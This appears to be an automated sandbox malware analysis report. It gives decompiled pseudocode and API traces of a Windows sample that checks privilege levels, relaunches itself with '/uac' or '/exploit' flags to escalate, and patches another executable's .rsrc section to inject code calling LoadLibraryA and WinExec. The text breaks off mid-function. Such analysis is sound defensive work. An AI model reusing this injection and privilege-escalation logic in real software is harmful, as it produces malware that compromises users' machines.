    						 *((intOrPtr*)(_t97 + 0x5c)) = 0;
    						 *((intOrPtr*)(_t97 + 0x6c)) = 0;
    						 *((intOrPtr*)(_t97 + 0x68)) = 0;
    						 *((intOrPtr*)(_t97 + 0x64)) = 0;
    						_push(GetModuleHandleA(0));
    						_t56 = E00DB2308(_t108);
    						if(_t56 == 0) {
    							L19:
    							E00DB2481();
    							L20:
    							return 0;
    						}
    						if( *((intOrPtr*)(_t97 + 0x5c)) != 0 ||  *((intOrPtr*)(_t97 + 0x64)) != 0) {
    							L17:
    							_t58 = E00DB22DC(_t118);
    							_t119 = _t58;
    							if(_t58 == 0) {
    								E00DB1434(_t119);
    							}
    							goto L19;
    						} else {
    							__imp__#680();
    							if(_t56 != 0) {
    								goto L17;
    							}
    							GetModuleFileNameA(GetModuleHandleA(0), _t97 - 0x144, 0x103);
    							 *(_t97 + 0x74) = 0;
    							 *((intOrPtr*)(_t97 + 0x70)) = 0;
    							if(E00DB250C(_t86, _t97 - 0x144, _t97 + 0x74, _t97 + 0x70) != 0) {
    								 *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) =  *( *((intOrPtr*)( *(_t97 + 0x74) + 0x3c)) +  *(_t97 + 0x74) + 0x16) | 0x00002000;
    								if( *((intOrPtr*)(_t97 - 0x3c)) < 6 || _t84 == 0 &&  *((intOrPtr*)(_t97 + 0x6c)) == 0) {
    									_push(_t97 - 0x144);
    									_push("\"%s\" /exploit");
    									_push(_t97 - 0x248);
    									E00DB3E87();
    									E00DB3143(__eflags,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
    								} else {
    									if( *((intOrPtr*)(_t97 + 0x60)) < 0x3000) {
    										_t118 =  *((intOrPtr*)(_t97 + 0x68));
    										if( *((intOrPtr*)(_t97 + 0x68)) == 0) {
    											_push(_t97 - 0x144);
    											_push("\"%s\" /uac");
    											_push(_t97 - 0x248);
    											E00DB3E87();
    											E00DB2BDC(_t84,  *(_t97 + 0x74),  *((intOrPtr*)(_t97 + 0x70)), _t97 - 0x248);
    										}
    									}
    								}
    								Sleep(0xbb8);
    								LocalFree( *(_t97 + 0x74));
    							}
    							goto L17;
    						}
    					}
    					_push(_t97 + 0x60);
    					_push(GetCurrentProcess());
    					_t80 = E00DB289C();
    					_t108 = _t80;
    					if(_t80 == 0) {
    						goto L20;
    					}
    					goto L4;
    				}
    				 *(_t97 - 0x40) = 0x94;
    				if(GetVersionExA(_t97 - 0x40) == 0) {
    					goto L20;
    				}
    				goto L2;
    			}











    0x00db1cda
    0x00db1cdb
    0x00db1cf3
    0x00db1cfc
    0x00db1d07
    0x00db1d15
    0x00db1d2c
    0x00db1d30
    0x00db1d33
    0x00db1d4d
    0x00db1d4d
    0x00db1d5c
    0x00db1d60
    0x00db1d64
    0x00db1d68
    0x00db1d6a
    0x00db1d6d
    0x00db1d70
    0x00db1d73
    0x00db1d78
    0x00db1d79
    0x00db1d80
    0x00db1e8a
    0x00db1e8a
    0x00db1e8f
    0x00db1e98
    0x00db1e98
    0x00db1d89
    0x00db1e7c
    0x00db1e7c
    0x00db1e81
    0x00db1e83
    0x00db1e85
    0x00db1e85
    0x00000000
    0x00db1d98
    0x00db1d98
    0x00db1da0
    0x00000000
    0x00000000
    0x00db1db6
    0x00db1dcb
    0x00db1dce
    0x00db1dd8
    0x00db1deb
    0x00db1df3
    0x00db1e41
    0x00db1e48
    0x00db1e4d
    0x00db1e4e
    0x00db1e63
    0x00db1dfe
    0x00db1e05
    0x00db1e07
    0x00db1e0a
    0x00db1e12
    0x00db1e19
    0x00db1e1e
    0x00db1e1f
    0x00db1e34
    0x00db1e34
    0x00db1e0a
    0x00db1e05
    0x00db1e6d
    0x00db1e76
    0x00db1e76
    0x00000000
    0x00db1dd8
    0x00db1d89
    0x00db1d38
    0x00db1d3f
    0x00db1d40
    0x00db1d45
    0x00db1d47
    0x00000000
    0x00000000
    0x00000000
    0x00db1d47
    0x00db1d1b
    0x00db1d26
    0x00000000
    0x00000000
    0x00000000

    APIs
      • Part of subcall function 00DB29C6: _memset.LIBCMT ref: 00DB29E1
      • Part of subcall function 00DB29C6: GetVersionExA.KERNEL32(?,?,?), ref: 00DB29F0
      • Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB29FA
      • Part of subcall function 00DB29C6: GetCurrentProcess.KERNEL32(00000008,?,?,?), ref: 00DB2A24
      • Part of subcall function 00DB29C6: OpenProcessToken.ADVAPI32(00000000,?,?), ref: 00DB2A2B
      • Part of subcall function 00DB29C6: GetTokenInformation.KERNELBASE(?,00000012(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A51
      • Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB2A57
      • Part of subcall function 00DB29C6: CloseHandle.KERNEL32(?), ref: 00DB2A60
      • Part of subcall function 00DB29C6: GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?), ref: 00DB2A86
      • Part of subcall function 00DB29C6: CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?,?,?), ref: 00DB2A9E
      • Part of subcall function 00DB29C6: CheckTokenMembership.ADVAPI32(?,?,?,?,?), ref: 00DB2AB6
      • Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB2AC5
      • Part of subcall function 00DB29C6: CloseHandle.KERNEL32(?), ref: 00DB2ACE
      • Part of subcall function 00DB29C6: IsUserAnAdmin.SHELL32 ref: 00DB2AD2
      • Part of subcall function 00DB29C6: CloseHandle.KERNEL32(?), ref: 00DB2ADD
      • Part of subcall function 00DB29C6: GetLastError.KERNEL32(?,?), ref: 00DB2AE1
      • Part of subcall function 00DB29C6: IsUserAnAdmin.SHELL32 ref: 00DB2AEB
    • _memset.LIBCMT ref: 00DB1CFC
    • GetVersionExA.KERNEL32(?,?,?), ref: 00DB1D11
    • GetVersionExA.KERNEL32(?,?,?), ref: 00DB1D22
    • GetCurrentProcess.KERNEL32(?,?,?), ref: 00DB1D39
      • Part of subcall function 00DB289C: _memset.LIBCMT ref: 00DB28CA
      • Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00DB28DF
      • Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?), ref: 00DB28F0
      • Part of subcall function 00DB289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00DB290D
      • Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DB292F
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB293B
      • Part of subcall function 00DB289C: LocalAlloc.KERNEL32(00000040,?), ref: 00DB2947
      • Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00DB2960
      • Part of subcall function 00DB289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DB2968
      • Part of subcall function 00DB289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DB2978
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB298B
      • Part of subcall function 00DB289C: LocalFree.KERNEL32(00000000), ref: 00DB2992
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299A
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299E
      • Part of subcall function 00DB289C: CloseHandle.KERNEL32(?), ref: 00DB29A7
      • Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB29AF
    • GetCommandLineA.KERNEL32(?,?), ref: 00DB1D4D
    • GetModuleHandleA.KERNEL32(00000000,?,?,?,?,?,?), ref: 00DB1D76
      • Part of subcall function 00DB2308: GetTickCount.KERNEL32 ref: 00DB2313
      • Part of subcall function 00DB2308: _memset.LIBCMT ref: 00DB2344
      • Part of subcall function 00DB2308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB2359
      • Part of subcall function 00DB2308: GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB236A
      • Part of subcall function 00DB2308: GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00DB2392
      • Part of subcall function 00DB2308: CommandLineToArgvW.SHELL32(00000000), ref: 00DB2399
      • Part of subcall function 00DB2308: LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00DB2432
    • IsUserAnAdmin.SHELL32 ref: 00DB1D98
    • GetModuleHandleA.KERNEL32(00000000,?,00000103,?,?), ref: 00DB1DB3
    • GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00DB1DB6
      • Part of subcall function 00DB250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
      • Part of subcall function 00DB250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
      • Part of subcall function 00DB250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
      • Part of subcall function 00DB250C: ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
      • Part of subcall function 00DB250C: CloseHandle.KERNEL32(00000000), ref: 00DB2583
      • Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C
      • Part of subcall function 00DB2BDC: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00DB2BFB
      • Part of subcall function 00DB2BDC: GetProcAddress.KERNEL32(00000000), ref: 00DB2C02
      • Part of subcall function 00DB2BDC: GetCurrentProcess.KERNEL32(?), ref: 00DB2C12
      • Part of subcall function 00DB2BDC: GetVersionExA.KERNEL32(?), ref: 00DB2C30
      • Part of subcall function 00DB2BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00DB2C73
      • Part of subcall function 00DB2BDC: GetTickCount.KERNEL32 ref: 00DB2C75
      • Part of subcall function 00DB2BDC: _strlen.LIBCMT ref: 00DB2C88
      • Part of subcall function 00DB2BDC: wsprintfA.USER32 ref: 00DB2C96
      • Part of subcall function 00DB2BDC: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB2CC2
      • Part of subcall function 00DB2BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00DB2CE4
      • Part of subcall function 00DB2BDC: GetTempPathA.KERNEL32(00000104,?), ref: 00DB2D5E
      • Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?), ref: 00DB2D7A
      • Part of subcall function 00DB2BDC: GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00DB2DBE
      • Part of subcall function 00DB2BDC: GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00DB2DDB
      • Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E4B
      • Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?,?), ref: 00DB2E54
      • Part of subcall function 00DB2BDC: LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00DB2E59
      • Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E66
      • Part of subcall function 00DB2BDC: DeleteFileA.KERNEL32(?), ref: 00DB2E6F
      • Part of subcall function 00DB2BDC: GetLastError.KERNEL32 ref: 00DB2E77
      • Part of subcall function 00DB3143: GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00DB315B
      • Part of subcall function 00DB3143: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB3173
      • Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB31A5
      • Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB31CD
      • Part of subcall function 00DB3143: GetTickCount.KERNEL32 ref: 00DB31CF
      • Part of subcall function 00DB3143: _strlen.LIBCMT ref: 00DB31E2
      • Part of subcall function 00DB3143: wsprintfA.USER32 ref: 00DB31F0
      • Part of subcall function 00DB3143: GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00DB3207
      • Part of subcall function 00DB3143: GetProcAddress.KERNEL32(00000000), ref: 00DB320A
      • Part of subcall function 00DB3143: GetCurrentProcess.KERNEL32(00000000), ref: 00DB321A
      • Part of subcall function 00DB3143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB3251
      • Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB330F
      • Part of subcall function 00DB3143: GetTickCount.KERNEL32 ref: 00DB3311
      • Part of subcall function 00DB3143: _strlen.LIBCMT ref: 00DB3324
      • Part of subcall function 00DB3143: wsprintfA.USER32 ref: 00DB3332
      • Part of subcall function 00DB3143: MoveFileA.KERNEL32(?,?), ref: 00DB3349
      • Part of subcall function 00DB3143: LocalFree.KERNEL32(?,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB3384
      • Part of subcall function 00DB3143: GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB33D2
      • Part of subcall function 00DB3143: RegisterWindowMessageA.USER32(?,?), ref: 00DB341D
      • Part of subcall function 00DB3143: LockWorkStation.USER32 ref: 00DB343D
      • Part of subcall function 00DB3143: CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00DB3456
      • Part of subcall function 00DB3143: GetLastError.KERNEL32 ref: 00DB3463
      • Part of subcall function 00DB3143: WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00DB3471
      • Part of subcall function 00DB3143: CloseHandle.KERNEL32(00000000), ref: 00DB3485
      • Part of subcall function 00DB3143: GetTempPathA.KERNEL32(00000104,?), ref: 00DB3493
      • Part of subcall function 00DB3143: GetTickCount.KERNEL32 ref: 00DB3495
      • Part of subcall function 00DB3143: _strlen.LIBCMT ref: 00DB34A8
      • Part of subcall function 00DB3143: wsprintfA.USER32 ref: 00DB34B6
      • Part of subcall function 00DB3143: MoveFileA.KERNEL32(?,?), ref: 00DB34CD
      • Part of subcall function 00DB3143: CopyFileA.KERNEL32(?,?,00000000), ref: 00DB34DF
    • Sleep.KERNEL32(00000BB8,?,?,?,?,?,?,?,?), ref: 00DB1E6D
    • LocalFree.KERNEL32(?,?,?), ref: 00DB1E76
      • Part of subcall function 00DB22DC: GetLastError.KERNEL32(00000000,7622DAA3,00DB232C,00000000), ref: 00DB22EB
      • Part of subcall function 00DB22DC: CloseHandle.KERNEL32(00000000), ref: 00DB22FD
      • Part of subcall function 00DB1434: IsUserAnAdmin.SHELL32 ref: 00DB1435
      • Part of subcall function 00DB1434: GetLastError.KERNEL32(?,?), ref: 00DB1446
      • Part of subcall function 00DB1434: CloseHandle.KERNEL32(00000000), ref: 00DB145E
      • Part of subcall function 00DB2481: ExitProcess.KERNEL32 ref: 00DB24A3
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: ErrorLast$Handle$File$CloseVersion$LocalPathProcessTempToken$CountModule$DeleteFreeTick$AdminCurrentDirectoryInformationUser_memset_strlenwsprintf$CommandCreateLineName$AddressAllocAuthorityClipboardFormatMoveOpenProcSystemWindows$ArgvCheckCopyEventExitKnownLockMembershipMessageObjectReadRegisterSingleSizeSleepStationWaitWellWindowWork
    • String ID: "%s" /exploit$"%s" /uac
    • API String ID: 1631179323-107240129
    • Opcode ID: fe49fdd2df998f167974c9b3d6aeccbdefb8fb28cc0e294fa7e0041c5cfc4634
    • Instruction ID: 6972e45aabfaa70fd3199a4ae166d4bdc6fd3e8d17d862c2187985e0bd20b4bb
    • Opcode Fuzzy Hash: fe49fdd2df998f167974c9b3d6aeccbdefb8fb28cc0e294fa7e0041c5cfc4634
    • Instruction Fuzzy Hash: F841057A900218DBDF21EFA5DC55AEE7BACEF44340F54022AF91AD2121EB34DA45CB70
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 100%
    			E00DB2308(void* __eflags) {
    				void* _t29;
    				void* _t33;
    				void* _t34;
    				void* _t35;
    				void* _t36;
    				signed int _t38;
    				void* _t40;
    				void* _t41;
    				void* _t42;
    				void* _t43;
    				int _t45;
    				void* _t47;
    				void _t49;
    				void _t50;
    				void _t51;
    				void _t52;
    				signed int _t63;
    				void* _t70;
    				void* _t72;
    				void* _t76;
    
    				_t76 = __eflags;
    				_t70 = _t72 - 0x64;
    				E00DB2001(GetTickCount());
    				 *0xdb5a00 =  *((intOrPtr*)(_t70 + 0x6c));
    				if(E00DB22DC(_t76) == 0) {
    					E00DB3510(_t70 - 0x3c, 0, 0x9c);
    					 *(_t70 - 0x3c) = 0x9c;
    					_t29 = GetVersionExA(_t70 - 0x3c);
    					__eflags = _t29;
    					if(_t29 != 0) {
    						L4:
    						__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 5;
    						if( *((intOrPtr*)(_t70 - 0x38)) != 5) {
    							L6:
    							__eflags =  *((intOrPtr*)(_t70 - 0x38)) - 6;
    							if( *((intOrPtr*)(_t70 - 0x38)) >= 6) {
    								L8:
    								 *(_t70 + 0x60) =  *(_t70 + 0x60) & 0x00000000;
    								_t47 = CommandLineToArgvW(GetCommandLineW(), _t70 + 0x60);
    								__eflags = _t47;
    								if(_t47 == 0) {
    									L20:
    									_t33 =  *(_t70 + 0x70);
    									__eflags = _t33;
    									if(_t33 != 0) {
    										_t52 =  *0xdb5a04; // 0x0
    										 *_t33 = _t52;
    									}
    									_t34 =  *(_t70 + 0x74);
    									__eflags = _t34;
    									if(_t34 != 0) {
    										_t51 =  *0xdb5a08; // 0x0
    										 *_t34 = _t51;
    									}
    									_t35 =  *(_t70 + 0x78);
    									__eflags = _t35;
    									if(_t35 != 0) {
    										_t50 =  *0xdb5a0c; // 0x0
    										 *_t35 = _t50;
    									}
    									_t36 =  *(_t70 + 0x7c);
    									__eflags = _t36;
    									if(_t36 != 0) {
    										_t49 =  *0xdb5a10; // 0x0
    										 *_t36 = _t49;
    									}
    									_t38 = 1;
    									__eflags = 1;
    									L29:
    									goto L30;
    								}
    								_t63 = 1;
    								__eflags =  *(_t70 + 0x60) - 1;
    								if( *(_t70 + 0x60) <= 1) {
    									L19:
    									LocalFree(_t47);
    									goto L20;
    								} else {
    									goto L10;
    								}
    								do {
    									L10:
    									_t69 = _t47 + _t63 * 4;
    									_t40 = E00DB3A11( *(_t47 + _t63 * 4), L"/runmain");
    									__eflags = _t40;
    									if(_t40 != 0) {
    										_t41 = E00DB3A11( *_t69, L"/exploit");
    										__eflags = _t41;
    										if(_t41 != 0) {
    											_t42 = E00DB3A11( *_t69, L"/uac");
    											__eflags = _t42;
    											if(_t42 != 0) {
    												_t43 = E00DB3A11( *_t69, L"/executable");
    												__eflags = _t43;
    												if(_t43 == 0) {
    													 *0xdb5a10 = 1;
    												}
    											} else {
    												 *0xdb5a0c = 1;
    											}
    										} else {
    											 *0xdb5a08 = 1;
    										}
    									} else {
    										 *0xdb5a04 = 1;
    									}
    									_t63 = _t63 + 1;
    									__eflags = _t63 -  *(_t70 + 0x60);
    								} while (_t63 <  *(_t70 + 0x60));
    								goto L19;
    							}
    							L7:
    							_t38 = 0;
    							goto L29;
    						}
    						__eflags =  *((intOrPtr*)(_t70 - 0x34)) - 1;
    						if( *((intOrPtr*)(_t70 - 0x34)) >= 1) {
    							goto L8;
    						}
    						goto L6;
    					}
    					 *(_t70 - 0x3c) = 0x94;
    					_t45 = GetVersionExA(_t70 - 0x3c);
    					__eflags = _t45;
    					if(_t45 == 0) {
    						goto L7;
    					}
    					goto L4;
    				} else {
    					_t38 = 0;
    					L30:
    					return _t38;
    				}
    			}























    0x00db2308
    0x00db2309
    0x00db231a
    0x00db2322
    0x00db232e
    0x00db2344
    0x00db234f
    0x00db2359
    0x00db235b
    0x00db235d
    0x00db2370
    0x00db2370
    0x00db2374
    0x00db237c
    0x00db237c
    0x00db2380
    0x00db2389
    0x00db2389
    0x00db239f
    0x00db23a1
    0x00db23a3
    0x00db2439
    0x00db2439
    0x00db243d
    0x00db243f
    0x00db2441
    0x00db2447
    0x00db2447
    0x00db2449
    0x00db244c
    0x00db244e
    0x00db2450
    0x00db2456
    0x00db2456
    0x00db2458
    0x00db245b
    0x00db245d
    0x00db245f
    0x00db2465
    0x00db2465
    0x00db2467
    0x00db246a
    0x00db246c
    0x00db246e
    0x00db2474
    0x00db2474
    0x00db2478
    0x00db2478
    0x00db2479
    0x00000000
    0x00db2479
    0x00db23ac
    0x00db23ad
    0x00db23b0
    0x00db2431
    0x00db2432
    0x00000000
    0x00000000
    0x00000000
    0x00000000
    0x00db23b2
    0x00db23b2
    0x00db23b2
    0x00db23bc
    0x00db23c3
    0x00db23c5
    0x00db23da
    0x00db23e1
    0x00db23e3
    0x00db23f8
    0x00db23ff
    0x00db2401
    0x00db2416
    0x00db241d
    0x00db241f
    0x00db2421
    0x00db2421
    0x00db2403
    0x00db2403
    0x00db2403
    0x00db23e5
    0x00db23e5
    0x00db23e5
    0x00db23c7
    0x00db23c7
    0x00db23c7
    0x00db242b
    0x00db242c
    0x00db242c
    0x00000000
    0x00db23b2
    0x00db2382
    0x00db2382
    0x00000000
    0x00db2382
    0x00db2376
    0x00db237a
    0x00000000
    0x00000000
    0x00000000
    0x00db237a
    0x00db2363
    0x00db236a
    0x00db236c
    0x00db236e
    0x00000000
    0x00000000
    0x00000000
    0x00db2330
    0x00db2330
    0x00db247a
    0x00db247e
    0x00db247e

    APIs
    • GetTickCount.KERNEL32 ref: 00DB2313
      • Part of subcall function 00DB22DC: GetLastError.KERNEL32(00000000,7622DAA3,00DB232C,00000000), ref: 00DB22EB
      • Part of subcall function 00DB22DC: CloseHandle.KERNEL32(00000000), ref: 00DB22FD
    • _memset.LIBCMT ref: 00DB2344
    • GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB2359
    • GetVersionExA.KERNEL32(?,?,7622DAA3,00000000), ref: 00DB236A
    • GetCommandLineW.KERNEL32(?,00000000,?,7622DAA3,00000000), ref: 00DB2392
    • CommandLineToArgvW.SHELL32(00000000), ref: 00DB2399
    • LocalFree.KERNEL32(00000000,00000000,?,7622DAA3,00000000), ref: 00DB2432
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: CommandLineVersion$ArgvCloseCountErrorFreeHandleLastLocalTick_memset
    • String ID: /executable$/exploit$/runmain$/uac
    • API String ID: 2049752164-780269054
    • Opcode ID: 2eb99ddcbfc499b806f895cbcdf6c1a7f74734d841fdfff8550f2c0566ca1f60
    • Instruction ID: 4e6c73f6066c829ded35f4f40664c9abfef4d7af5d255cc4a85df399c3c718bc
    • Opcode Fuzzy Hash: 2eb99ddcbfc499b806f895cbcdf6c1a7f74734d841fdfff8550f2c0566ca1f60
    • Instruction Fuzzy Hash: 3C418C36504349DBDB14AFA5EC95BE937E8FB15350F180629E843E7664EB74E844CB30
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00DB2F02(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
    				signed int _v8;
    				char _v12;
    				intOrPtr _v16;
    				void* _t50;
    				void* _t66;
    				char* _t72;
    				void* _t78;
    				signed int _t80;
    				intOrPtr* _t82;
    				void* _t87;
    
    				_v16 = 0xdb2f01;
    				_t50 = E00DB20EC(_a12);
    				_v8 = _v8 & 0x00000000;
    				_v12 = _t50 + 0xdb2f01 - E00DB2E88 + 0x111;
    				_t87 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
    				_t80 =  *(_t87 + 6) & 0x0000ffff;
    				_t78 = ( *(_t87 + 0x14) & 0x0000ffff) + _t87 + 0x18;
    				if(_t80 == 0) {
    					L11:
    					return 1;
    				}
    				while(E00DB214C(_t78, ".rsrc", 5) != 0) {
    					_t78 = _t78 + 0x28;
    					_v8 = _v8 + 1;
    					if(_v8 < _t80) {
    						continue;
    					}
    					goto L11;
    				}
    				if( *((intOrPtr*)(_t78 + 0x10)) >= _v12) {
    					_t82 =  *((intOrPtr*)(_t78 + 0x14)) + _a4;
    					E00DB20CE(_t82, 0, 0x110);
    					 *((intOrPtr*)(_t82 + 8)) =  *((intOrPtr*)(_t87 + 0x28));
    					 *_t82 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "LoadLibraryA");
    					 *((intOrPtr*)(_t82 + 4)) = GetProcAddress(GetModuleHandleA("kernel32.dll"), "WinExec");
    					if(_a16 != 0) {
    						E00DB2194(_t82 + 0xc, _a16);
    					}
    					E00DB2194(_t82 + 0x110, _a12);
    					_t66 = E00DB20EC(_a12);
    					_t32 = _t82 + 0x111; // 0x111
    					E00DB20AE(_t66 + _t32, E00DB2E88, _v16);
    					 *((intOrPtr*)(_t87 + 0x28)) = E00DB20EC(_a12) +  *((intOrPtr*)(_t78 + 0xc)) + 0x111;
    					 *(_t78 + 0x24) =  *(_t78 + 0x24) | 0x20000000;
    					 *((intOrPtr*)(_t87 + 0x88)) = 0;
    					 *((intOrPtr*)(_t87 + 0x8c)) = 0;
    					_v12 = 0;
    					_v8 = 0;
    					_t72 =  &_v12;
    					__imp__CheckSumMappedFile(_a4, _a8, _t72,  &_v8);
    					if(_t72 == 0) {
    						GetLastError();
    					} else {
    						 *(_t87 + 0x58) = _v8;
    					}
    					goto L11;
    				}
    				return 0;
    			}













    0x00db2f19
    0x00db2f1c
    0x00db2f21
    0x00db2f2c
    0x00db2f35
    0x00db2f37
    0x00db2f3f
    0x00db2f45
    0x00db305b
    0x00000000
    0x00db305d
    0x00db2f4b
    0x00db2f5c
    0x00db2f5f
    0x00db2f65
    0x00000000
    0x00000000
    0x00000000
    0x00db2f67
    0x00db2f72
    0x00db2f7e
    0x00db2f89
    0x00db2f9b
    0x00db2fb5
    0x00db2fc8
    0x00db2fcb
    0x00db2fd4
    0x00db2fd4
    0x00db2fe3
    0x00db2feb
    0x00db2ff3
    0x00db3000
    0x00db3017
    0x00db301a
    0x00db3023
    0x00db3029
    0x00db302f
    0x00db3032
    0x00db3039
    0x00db3043
    0x00db304b
    0x00db3055
    0x00db304d
    0x00db3050
    0x00db3050
    0x00000000
    0x00db304b
    0x00000000

    APIs
      • Part of subcall function 00DB20CE: _memset.LIBCMT ref: 00DB20E1
    • GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00DB2F9E
    • GetProcAddress.KERNEL32(00000000), ref: 00DB2FA5
    • GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00DB2FB7
    • GetProcAddress.KERNEL32(00000000), ref: 00DB2FBE
    • CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00DB2E88,?,?,?,?), ref: 00DB3043
    • GetLastError.KERNEL32 ref: 00DB3055
    Strings
    Memory Dump Source
    • Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true
    • Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
    • Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
    • Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd
    Similarity
    • API ID: AddressHandleModuleProc$CheckErrorFileLastMapped_memset
    • String ID: .rsrc$LoadLibraryA$WinExec$kernel32.dll
    • API String ID: 600805798-1606967582
    • Opcode ID: 2ac554bc7989aa9a4e5ff4dca74a3989402f897ac6add8a5b302741c2d980b4c
    • Instruction ID: dc7fb8b82bf7c2dd8e8de4fb95a6a9b7ac571a6e2d358cd3d17ebae733ee5c46
    • Opcode Fuzzy Hash: 2ac554bc7989aa9a4e5ff4dca74a3989402f897ac6add8a5b302741c2d980b4c
    • Instruction Fuzzy Hash: 86417C76900309EFCB10EFA4C885AEA7BB8EF08340F514525F916E7251E770D654DB70
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 80%
    			E00DB2AF9(DWORD* _a4, intOrPtr _a8, char _a12) {
    				CHAR* _v8;
    				struct _PROCESS_INFORMATION _v24;
    				struct _STARTUPINFOA _v92;
    				intOrPtr* _t23;
    				char* _t24;
    				void* _t45;
    				long _t49;
    
    				_t23 = _a4;
    				_v8 = 0;
    				if(_t23 != 0) {
    					 *_t23 = 0;
    				}
    				_t24 =  &_a12;
    				_push(_t24);
    				_push(_a8);
    				E00DB3E9D();
    				_t45 = LocalAlloc(0x40, _t24 + 0x100);
    				if(_t45 != 0) {
    					_push( &_a12);
    					_push(_a8);
    					_push(_t45);
    					E00DB3E92();
